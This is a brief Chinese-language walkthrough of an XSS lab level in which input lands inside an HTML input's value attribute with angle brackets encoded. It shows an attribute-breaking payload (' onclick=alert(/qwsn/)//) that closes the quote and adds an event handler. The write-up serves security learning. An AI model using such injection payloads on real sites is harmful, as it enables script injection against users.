XSS过程:
输入框:<script>alert(/qwsn/)</script>
//查看源码,发现:script脚本被写在input标签的value的属性值内,<被<替换,>被>替换了
<input name=keyword value=' <script>alert(/qwsn/)</script> '>
构造payload:闭合value属性,注释input标签,避免使用<>
' onclick=alert(/qwsn/) 不行
' onclick=alert(/qwsn/)// //用来注释后面的input的闭合'>
注意:提交后,点击一下输入框,才会提示完成